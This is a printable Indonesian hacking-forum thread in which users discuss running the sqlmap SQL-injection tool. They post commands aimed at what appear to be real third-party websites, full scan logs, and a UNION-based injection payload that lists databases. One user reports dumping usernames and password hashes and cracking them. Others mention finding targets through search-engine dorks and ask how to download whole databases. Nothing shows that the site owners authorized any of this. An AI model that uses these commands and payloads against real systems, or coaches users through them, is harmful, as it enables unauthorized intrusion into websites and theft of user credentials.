SQLi Sqlmap.py - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Penetration Testing Os (https://www.indonesianbacktrack.or.id/forum/forum-170.html) +--- Forum: Backtrack (https://www.indonesianbacktrack.or.id/forum/forum-171.html) +---- Forum: BackTrack 5 (https://www.indonesianbacktrack.or.id/forum/forum-74.html) +----- Forum: BackTrack 5 tutorial (https://www.indonesianbacktrack.or.id/forum/forum-82.html) +----- Thread: SQLi Sqlmap.py (/thread-713.html) |
RE: SQLi Sqlmap.py - Veronochi - 11-23-2011 udah taro target step 1 | step 2 | step 3 | step 4 dan akhirnya kena penyakit step... ehehehehehe RE: SQLi Sqlmap.py - xombix - 11-29-2011 nice share om, ane bookmark dlo dah RE: SQLi Sqlmap.py - Veronochi - 11-29-2011 ok dah.. RE: SQLi Sqlmap.py - Veronochi - 12-01-2011 blom ketemu ya bugnya??? RE: SQLi Sqlmap.py - cassaprodigy - 12-01-2011 google dork kendalanya di mana bro ? RE: SQLi Sqlmap.py - OWL#9 - 12-05-2011 kk mau tanya nih. saat baru pertama mulai kenapa seperti ini yah root@bt:/pentest/database/sqlmap# python sqlmap.py -u https://www.marshalls.ky/vehicles.php?id=4 --dbs Traceback (most recent call last): File "sqlmap.py", line 27, in <module> from lib.controller.controller import start File "/pentest/database/sqlmap/lib/controller/controller.py", line 13, in <module> from lib.controller.action import action File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in <module> from lib.controller.handler import setHandler File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in <module> from plugins.dbms.mssqlserver import MSSQLServerMap File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py", line 14, in <module> from plugins.dbms.mssqlserver.enumeration import Enumeration File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py", line 28, in <module> from plugins.generic.enumeration import Enumeration as GenericEnumeration File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 16, in <module> from lib.core.common import BigArray ImportError: cannot import name BigArray RE: SQLi Sqlmap.py - revzter - 01-17-2012 kk gimana klo databesNya gak ada muncul?, contohnya pas kita -------------------------------- # python sqlmap.py -u http://www.side.com/index.php?id=7 --dbs -------------------------------- databasenya gak ada muncul, kaya "admin" dll. di terminal aku cuma muncul gini : --------------------------------- sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 03:42:54 [03:42:55] [INFO] using '/pentest/database/sqlmap/output/side.com/session' as session file [03:42:56] [INFO] testing connection to the target url [03:43:05] [INFO] testing if the url is stable, wait a few seconds [03:43:07] [INFO] url is stable [03:43:07] [INFO] testing if GET parameter 'id' is dynamic [03:43:08] [INFO] confirming that GET parameter 'id' is dynamic [03:43:08] [INFO] GET parameter 'id' is dynamic ^C [03:43:08] [ERROR] user aborted [*] shutting down at: 03:43:08 root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.side.com/index.php?id=7 --dbs sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program. [*] starting at: 03:43:17 [03:43:17] [INFO] using '/pentest/database/sqlmap/output/www.side.com/session' as session file [03:43:18] [INFO] testing connection to the target url [03:43:20] [INFO] testing if the url is stable, wait a few seconds [03:43:24] [INFO] url is stable [03:43:24] [INFO] testing if GET parameter 'id' is dynamic [03:43:25] [INFO] confirming that GET parameter 'id' is dynamic [03:43:26] [INFO] GET parameter 'id' is dynamic [03:43:28] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable [03:43:28] [INFO] testing sql injection on GET parameter 'id' [03:43:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [03:43:53] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [03:44:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' [03:44:04] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' [03:44:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' [03:44:18] [INFO] testing 'MySQL > 5.0.11 stacked queries' [03:44:26] [INFO] testing 'PostgreSQL > 8.1 stacked queries' [03:44:34] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries' [03:44:42] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [03:44:49] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' [03:44:55] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' [03:45:04] [INFO] testing 'Oracle AND time-based blind' [03:45:12] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' [03:46:46] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' [03:46:46] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS [03:48:30] [WARNING] GET parameter 'id' is not injectable [03:48:30] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details -------------------------------- seharusnya klo benaran ada bug harusnya muncul kaya gini kan ...? (contoh) -------------------------------- -------------------------------- Place: GET Parameter: id Type: UNION query Title: MySQL UNION query (NULL) - 1 to 10 columns Payload: id=11 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(58,102,109,100,58),CHAR(70,90,99,74,104,99,88,71,102,102),CHAR(58,111,105,97,58)), NULL# --- [02:50:29] [INFO] manual usage of GET payloads requires url encoding [02:50:29] [INFO] testing MySQL [02:50:30] [INFO] confirming MySQL [02:50:34] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.2.21, PHP 5.2.17 back-end DBMS: MySQL >= 5.0.0 [02:50:34] [INFO] fetching database names [02:50:42] [INFO] the SQL query used returns 2 entries [02:50:50] [INFO] retrieved: "sango" [02:51:00] [INFO] retrieved: "information_schema" available databases [2]: [*] information_schema [*] xxxxxxxx --------------------------- itu berarti web tersebut gak ada bugNya atau gimana kk....??, aku masih samar samar, kk ada saran aku harus belajar apa dlu...? RE: SQLi Sqlmap.py - ekawithoutyou - 01-17-2012 (12-05-2011, 11:25 PM)OWL#9 Wrote: kk mau tanya nih. saat baru pertama mulai kenapa seperti ini yah Setau ane ni filenya ga ada kalo nda error... coba dah mending diUpdate aja.... bisa liat disini dah Code: http://forum.indonesianbacktrack.or.id/showthread.php?tid=1572 RE: SQLi Sqlmap.py - shin_orochi - 01-26-2012 Om, ane udh berhasil nge-dump table nya, dapat username ama password, tapi password nya di encrypt, ane coba decrypt pake md5 decrypted gk bisa T_T, gmn cara nya om, buat nge decrypt password nya? (01-26-2012, 06:36 PM)shin_orochi Wrote: Om, ane udh berhasil nge-dump table nya, dapat username ama password, tapi password nya di encrypt, ane coba decrypt pake md5 decrypted gk bisa T_T, gmn cara nya om, buat nge decrypt password nya? eh udh nemu ding , anyway, makasih om tutorialnya, it's work! RE: SQLi Sqlmap.py - fadligore - 01-29-2012 Maaf nih mau nanya soal Sqlmap, kalo semisal udah ketemu semua tabel - tabel nya terus kita pengen download database atau isi dari tabel2 tersebut apa bisa tanpa harus mengetikkan perintah --dump ? terimakasih sebelum nya |